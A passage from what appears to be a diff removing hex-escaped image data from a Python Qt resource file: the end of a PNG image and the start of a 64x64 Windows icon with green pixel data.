-\x35\x1f\x17\x2d\x7f\x9e\xd7\x70\xe4\x73\xd4\x17\xf1\xa8\x28\xa2\ -\x15\x5b\x63\x8a\xce\xde\x39\x5e\xfe\x28\xa5\x11\xc5\xeb\xe0\x14\ -\x8d\x26\x8e\xe2\x17\x56\xe2\xf7\xa8\xc2\x96\x87\x03\x0a\x5b\xe0\ -\x40\x9a\xb1\xac\xb1\x53\x94\x8c\x9b\xd1\xbe\xd9\x98\x28\x0c\xa3\ -\x47\xfe\x33\xcc\xf8\x61\xaa\x54\x69\xf1\xc3\xe9\xee\xb0\xb0\xea\ -\x05\x5b\x9b\x3e\x78\xdb\xa6\x3d\xbc\x4b\x94\xc2\x5d\x8a\x50\x7c\ -\xa5\x1a\x48\x0f\x2b\xbe\x56\x0d\xe7\xfe\xf5\xbe\x19\x97\x7c\xb1\ -\xec\x33\x3f\x8c\xe5\xfe\x14\xf3\x0a\xb3\xb2\x70\xa9\x5f\x19\xf7\ -\xc6\x58\x20\x65\xa2\x19\x92\x27\x98\x21\x69\x7c\x71\x24\x8e\x15\ -\x50\xa0\x14\x6f\xc2\x38\x53\x24\xbb\x15\x47\xf2\x24\x13\x3c\xfb\ -\xc6\x04\xce\x9d\xde\x82\x5d\xa9\x6e\xb0\xb4\xfd\x1c\xb6\xa5\x47\ -\xa0\x64\xd9\x91\xa8\x51\xeb\xdf\xfb\xeb\xa9\xd7\x5d\xfa\xf5\x41\ -\x88\x54\xec\x55\x35\x99\x19\xd0\x24\x26\x22\xf5\xfa\x9f\x88\x5a\ -\xf8\x33\x1e\x74\x7b\x9f\xcb\x7b\x25\x04\x55\xa3\x40\x85\x20\xdf\ -\xa1\x30\xe9\x4d\x83\x18\x07\x0a\x8f\x5a\xad\x8c\xf4\xac\x01\x14\ -\x6c\x60\xdd\xb2\x38\xd9\xfa\x9d\x37\x27\x54\x27\x0f\x7f\xb7\x16\ -\xe3\x62\xd0\x60\x14\x19\x21\x04\x1b\x8d\x7a\x14\x60\x3d\xc7\x17\ -\xf2\xd7\xf9\x4d\x28\xbe\x86\x8c\x1b\x50\x98\xe2\x77\xa7\x4d\x98\ -\x16\xbf\x96\x12\x76\x52\xa8\x23\xc5\x6f\x52\x23\xd1\x40\xfc\x26\ -\x55\xfc\xa2\x9f\xb1\xfc\x21\x35\xed\xed\x9d\xa3\xe0\x40\xb1\x0f\ -\xf6\x48\xc2\xa5\x50\xe3\x7b\xd4\x52\xa5\xbe\x3a\x68\x6a\xd1\x0b\ -\xe6\x56\x3d\x60\x6e\xd9\x13\x66\xa4\x94\x75\x47\x7c\x6a\x59\x1b\ -\xdb\x29\xca\x1b\x26\x25\xe0\x5f\x8c\xdb\x01\x13\x33\xee\x55\xb9\ -\x2f\x15\x3f\x4e\xa1\x50\x7f\xa7\x67\x1d\x64\x59\x13\xe5\xec\x3a\ -\xc3\xca\x6e\x00\x9a\xd5\x68\x05\xef\xfe\x25\xf1\x64\xaa\x29\x54\ -\xd3\x4d\x91\xf1\x4d\x71\xa8\xb8\x07\xcd\xf8\xb6\x38\x32\xa6\x9b\ -\xe0\xc9\xb7\x26\x58\xfb\x65\x49\xb4\x6f\xd0\x18\x16\xb6\x03\xe5\ -\xaf\xfa\xad\x4b\x0f\x85\x5d\x99\xe1\xb0\x2d\x37\x12\xd5\x6a\xfe\ -\x7b\x7f\x8f\x7a\xe4\xe8\xf1\x5d\x97\xaf\x88\x6f\xad\x5e\x21\x54\ -\xb9\x94\x13\xfd\xa5\xfc\x0f\xc8\x4c\x4c\x40\xf2\xa9\xe3\x88\x9e\ -\x3f\x1b\x11\xfd\x3f\x41\x30\x0f\x47\x41\x6f\xf1\x1c\x20\x04\x58\ -\xa3\x0c\x45\x49\xaa\x13\x8a\x34\xb0\x6a\x69\xf8\x4b\xaf\x4a\x81\ -\x8a\xfc\x6a\x65\xb5\xd7\xf4\xa8\x27\xda\xbd\x41\xa1\xba\x78\xf8\ -\x77\x1f\xf8\x73\x42\x62\xff\x9f\xe2\xd1\xe7\xc7\x78\xf4\x9e\x95\ -\x80\xae\x33\x62\xf1\xd1\xb4\x58\x74\x9e\x16\x8f\x2e\xd3\x13\xd1\ -\x85\xd7\x5d\xa6\xc7\xa1\xcb\xb4\x38\x7c\x32\x23\x01\xdd\x67\x25\ -\xe1\xe3\x99\x09\xcc\x8f\x67\x4c\x1b\xc6\x32\x3d\x3d\x07\x61\xdb\ -\x79\x7a\x0c\x3e\x64\x3b\xc3\x3c\x13\x9f\x5e\x0a\xcb\x6c\xa1\xbb\ -\x65\x9e\x60\x5b\xe6\xab\x83\x66\x56\x7d\x50\x9c\x62\x2d\x2e\xff\ -\x19\x4a\x0f\x99\xb6\xb0\x1e\x08\x5b\xdb\x8f\xd1\xcc\xd2\x01\xfd\ -\xac\x6a\xc1\xc9\xa2\x0a\x5c\xcd\xdf\xc6\x97\x56\x35\xd1\xca\xb2\ -\x29\x4a\x95\xa4\x47\x2c\xf9\x15\x2c\xe4\x3f\x2b\x19\xc4\x7d\xe6\ -\x97\x14\xec\x40\x54\xaf\xf2\x2e\xfa\xb5\xae\x83\xa9\x5d\xab\xe0\ -\xa7\xde\x15\xf1\x6d\xd7\xca\x18\xc8\x65\xad\x5a\x95\x76\xb4\xef\ -\x23\xff\x29\x8a\x55\xa9\x21\xb0\x2e\x39\x0c\xd6\x14\xab\x6d\xe9\ -\x61\xd2\xa3\x56\xab\x35\xf1\x5f\x2d\xd4\xf3\x17\x2e\xf1\x94\x0e\ -\x64\xa9\xc5\x12\xce\x33\x3e\xd3\x12\x6e\x7f\xc5\x47\x62\x82\x2c\ -\x66\x64\xa9\x54\x48\x7f\xfe\x04\xc9\xb7\xaf\x22\x7a\xd3\x2a\x3c\ -\x1d\x3b\x1c\x21\xed\xea\x23\xa8\x26\xb7\x54\xd5\x6d\x70\xa7\x9a\ -\x0d\xf7\x9c\xa5\xe0\x4f\xee\x72\xa9\x0f\xa8\xc1\x34\x63\x7f\xc6\ -\x77\xab\xd9\xe1\xce\xdb\xb6\x8c\x79\x80\xd2\x95\xfb\xd7\xa4\x4d\ -\x3d\x7a\xdc\x06\xa5\x71\xaa\x7d\x95\x37\x27\x54\x11\xf6\xfc\x99\ -\xd1\x66\xdf\xd5\xf4\x4e\x3c\xc5\x77\xda\x72\x32\xbd\xd3\xca\x23\ -\xc9\x9d\x3c\xf6\x27\x77\x5a\xb4\x2f\xb5\xd3\xa2\x03\xaa\x4e\x4b\ -\x99\xf6\x60\x7a\xf1\x9e\x14\x89\xc7\xde\xb4\x4e\x8b\xf6\xb2\x8c\ -\x2c\xde\x97\x26\x59\x42\x3c\x04\x7b\x52\x25\x4b\x58\x36\x6f\x77\ -\x52\xa7\x1f\xb6\x27\x75\xfa\x65\x57\x7a\x13\xdd\xad\xf2\x85\xf2\ -\x15\x07\xad\xb6\x29\xd9\x3f\xc4\xb6\x54\xff\x10\x9b\x92\xfd\xb4\ -\xd8\x89\xeb\x01\x21\x25\x4b\x7d\x1a\x62\x5b\xe6\xf3\x10\x9b\xd2\ -\x03\x43\xac\x4b\xf7\x27\xfd\x42\xac\xcb\x0c\x08\xb1\x2b\x35\x28\ -\xc4\xae\xcc\x97\x21\x25\xcb\x7c\x45\xbe\x0e\xe1\xf6\x41\x1b\x97\ -\x1d\x24\xe3\x92\xa5\x05\x03\x43\x4a\x97\xe9\xcf\xbc\x81\xb4\xa5\ -\x5d\xb9\x41\x21\xa5\xca\x0d\xe6\xf5\xd0\x90\x32\xe5\x07\x87\x94\ -\x29\x37\x24\xa4\x4c\x05\xc2\x74\xf9\x8a\xc3\x42\xea\x35\x98\xf0\ -\xa5\xae\x4b\x32\x50\x28\xff\x1a\xa1\x9e\x3d\x7b\x6e\xd7\xb4\x6f\ -\x67\xc1\x63\xc9\x0a\x2c\x59\xb2\x1c\x9e\x9e\x3e\x58\xba\xd4\x57\ -\xfe\xa3\xbb\xa5\xcc\xf3\x62\xda\x73\xf1\x32\x78\x2c\xf6\xc6\xc2\ -\x1f\x7e\xc4\x22\xe7\x21\x58\xf8\x65\x17\xcc\xed\xde\x0a\x0b\xbb\ -\xb5\xc6\x2f\x9f\xb4\xc6\xec\x8f\x5a\x60\x4e\x97\x56\x98\xdb\x8d\ -\x74\x6f\xad\x8d\xc9\x2f\x5d\x5b\xe1\x27\xe6\xff\xfc\x71\x1b\xcc\ -\xed\xda\x96\x65\x6d\x30\xaf\x57\x3b\x22\xd2\xad\x30\x8f\xf5\xe7\ -\x76\x25\xdd\xdb\x62\x76\xbf\x4e\x6f\x56\xa8\x45\x21\x7f\xa0\x50\ -\x9a\x10\xf7\x37\x48\x1d\x5d\x57\xfe\x93\xa1\x4a\xeb\xfd\xec\xc9\ -\x7d\xf7\xc7\x0f\x83\xdc\x9f\x44\x84\x90\x50\xa6\x43\xdd\x9f\x3e\ -\x0c\x73\x7f\x1a\x71\xdf\xfd\xf9\xe3\x70\xf7\x67\x8f\xc2\xdd\x9f\ -\x3e\x0a\x76\x7f\xf6\x38\xcc\x3d\xf2\xc5\x53\xf7\xd8\xe8\xe7\xee\ -\xd1\xd1\x4f\xdd\x63\xa2\x9e\xb8\x47\x46\x3e\x71\x7f\xf1\xfc\xa9\ -\xfb\x8b\x17\x4f\xdc\x63\xe2\x5e\xb8\xc7\x92\xb8\x58\x12\xfd\xcc\ -\x3d\x86\x79\xd1\x2f\x1e\x31\x7e\xec\x1e\x1b\xf9\x94\xf9\x4f\xc8\ -\x73\xf7\xd8\x18\xd6\x8f\x7a\xec\x1e\x17\xf5\xcc\x3d\x2a\xf2\x85\ -\x7b\xd4\x73\xda\x45\xc6\x34\xd7\x75\xa9\x28\x14\x85\xa2\x50\x14\ -\x8a\x42\x51\x28\x0a\x45\xa1\x28\x14\x85\xa2\x50\x14\x8a\x42\x51\ -\x28\x0a\x45\x21\x3b\xfc\xe7\x3f\xff\x07\x4f\x8b\xe6\x2a\xae\x45\ -\xc2\xb5\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\ -\x00\x00\x82\xd2\ -\x00\ -\x00\x01\x00\x02\x00\x40\x40\x00\x00\x01\x00\x20\x00\x28\x42\x00\ -\x00\x26\x00\x00\x00\x00\x00\x00\x00\x01\x00\x20\x00\x84\x40\x00\ -\x00\x4e\x42\x00\x00\x28\x00\x00\x00\x40\x00\x00\x00\x80\x00\x00\ -\x00\x01\x00\x20\x00\x00\x00\x00\x00\x00\x40\x00\x00\x12\x0b\x00\ -\x00\x12\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\ -\x01\xff\xff\xff\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x8d\x8e\x14\x00\x8d\x7e\x0b\x01\x8d\xad\x25\ -\x12\x8d\xba\x2d\x37\x8d\xc0\x31\x66\x8d\xc5\x33\x94\x8d\xc8\x35\ -\xb9\x8d\xca\x36\xd5\x8d\xcb\x37\xe6\x8d\xcb\x37\xed\x8d\xcb\x37\ -\xec\x8d\xcb\x37\xe5\x8d\xca\x36\xd5\x8d\xc8\x35\xbe\x8d\xc5\x34\ -\x9d\x8d\xc1\x31\x71\x8d\xbb\x2d\x40\x8d\xaf\x26\x16\x8d\x8a\x12\ -\x02\x8d\x9b\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x01\xff\xff\xff\ -\x00\xff\xff\xff\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\x5e\x0e\x00\x8d\xf8\x43\ -\x00\x8d\xaa\x23\x0d\x8d\xbb\x2d\x40\x8d\xc4\x32\x87\x8d\xc9\x36\ -\xc4\x8d\xcd\x39\xe8\x8d\xd0\x3a\xfa\x8d\xd2\x3b\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd2\x3b\ -\xff\x8d\xd1\x3b\xfc\x8d\xce\x39\xed\x8d\xca\x36\xca\x8d\xc4\x33\ -\x8e\x8d\xbc\x2e\x47\x8d\xae\x26\x12\x8d\x0b\x00\x00\x8d\x8f\x13\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x8d\x66\x0e\x00\x8d\xff\x49\x00\x8d\xae\x26\x13\x8d\xbe\x2f\ -\x5c\x8d\xc7\x35\xb8\x8d\xce\x39\xf0\x8d\xd2\x3b\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd2\x3b\ -\xff\x8d\xcf\x39\xf4\x8d\xc9\x36\xc4\x8d\xc0\x30\x6d\x8d\xb2\x28\ -\x1c\x8d\x16\x00\x00\x8d\x9a\x19\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\x00\x00\x00\x8d\xb7\x29\ -\x00\x8d\xa8\x23\x0a\x8d\xbc\x2e\x55\x8d\xc8\x35\xc0\x8d\xcf\x3a\ -\xf8\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd0\x3a\xfc\x8d\xc9\x36\ -\xcf\x8d\xbe\x2f\x66\x8d\xad\x25\x10\x8d\xc1\x30\x00\x8d\x82\x0b\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x8d\x9e\x1c\x00\x8d\x00\x00\x00\x8d\xb6\x2a\ -\x2c\x8d\xc4\x33\xa4\x8d\xce\x39\xf4\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xcf\x3a\xf9\x8d\xc6\x34\xb3\x8d\xb8\x2c\x39\x8d\x7e\x08\ -\x01\x8d\xa0\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x8d\xaa\x23\x00\x8d\x9d\x1b\x04\x8d\xbc\x2e\x55\x8d\xca\x36\ -\xd7\x8d\xd2\x3b\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd2\x3c\xff\x8d\xcb\x37\xe2\x8d\xbe\x2f\ -\x6a\x8d\xa7\x21\x0a\x8d\xb1\x27\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xb0\x27\ -\x00\x8d\xa5\x20\x0a\x8d\xbf\x30\x76\x8d\xcd\x38\xee\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\xff\x8d\xd2\x3a\ -\xff\x8d\xd2\x3b\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3b\xff\x8d\xd2\x3b\xff\x8d\xd2\x3a\xff\x8d\xd2\x3b\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xce\x39\ -\xf6\x8d\xc2\x32\x91\x8d\xaf\x26\x13\x8d\xb7\x2a\x00\x8d\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xb2\x28\x00\x8d\xa9\x22\ -\x0c\x8d\xc1\x31\x88\x8d\xcf\x39\xf7\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd2\x3b\ -\xff\x8d\xd3\x3b\xff\x8c\xd6\x42\xff\x89\xdb\x4e\xff\x86\xe2\x5d\ -\xff\x83\xe8\x6b\xff\x81\xec\x75\xff\x80\xee\x79\xff\x80\xed\x78\ -\xff\x81\xeb\x73\xff\x83\xe7\x6b\xff\x85\xe3\x60\xff\x89\xdc\x51\ -\xff\x8b\xd6\x43\xff\x8d\xd3\x3c\xff\x8d\xd2\x3b\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd0\x3a\xfc\x8d\xc4\x33\xa2\x8d\xaf\x27\x16\x8d\xb8\x2b\ -\x00\x8d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x8d\xb1\x27\x00\x8d\xa5\x21\x0a\x8d\xc1\x31\ -\x8a\x8d\xcf\x3a\xf9\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd2\x3b\xff\x8d\xd4\x3e\xff\x89\xdc\x51\ -\xff\x82\xe9\x6f\xff\x7d\xf5\x88\xff\x7a\xfb\x97\xff\x78\xfe\x9e\ -\xff\x78\xff\xa1\xff\x78\xff\xa1\xff\x78\xff\xa2\xff\x78\xff\xa2\ -\xff\x78\xff\xa1\xff\x78\xff\xa1\xff\x78\xfe\x9f\xff\x79\xfc\x99\ -\xff\x7c\xf6\x8b\xff\x82\xeb\x72\xff\x88\xde\x55\xff\x8c\xd5\x40\ -\xff\x8d\xd2\x3b\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd0\x3a\xfd\x8d\xc4\x33\xa1\x8d\xad\x25\ -\x13\x8d\xb5\x29\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x8d\xaa\x23\x00\x8d\x92\x14\x04\x8d\xbf\x30\x78\x8d\xcf\x39\ -\xf8\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\ -\xff\x8d\xd3\x3d\xff\x88\xdd\x53\xff\x80\xef\x7b\xff\x7a\xfb\x98\ -\xff\x78\xff\xa1\xff\x78\xff\xa1\xff\x78\xff\xa1\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa1\xff\x78\xff\xa1\xff\x79\xfc\x9a\xff\x7e\xf2\x82\ -\xff\x87\xe0\x59\xff\x8c\xd4\x3f\xff\x8d\xd3\x3b\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd0\x3a\xfc\x8d\xc2\x32\ -\x91\x8d\xa6\x21\x0a\x8d\xaf\x26\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\x9e\x1c\ -\x00\x8d\xf0\x4e\x00\x8d\xbc\x2e\x54\x8d\xcd\x38\xee\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\xff\x8b\xd8\x47\ -\xff\x82\xeb\x72\xff\x7a\xfb\x98\xff\x78\xff\xa1\xff\x78\xff\xa1\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa1\ 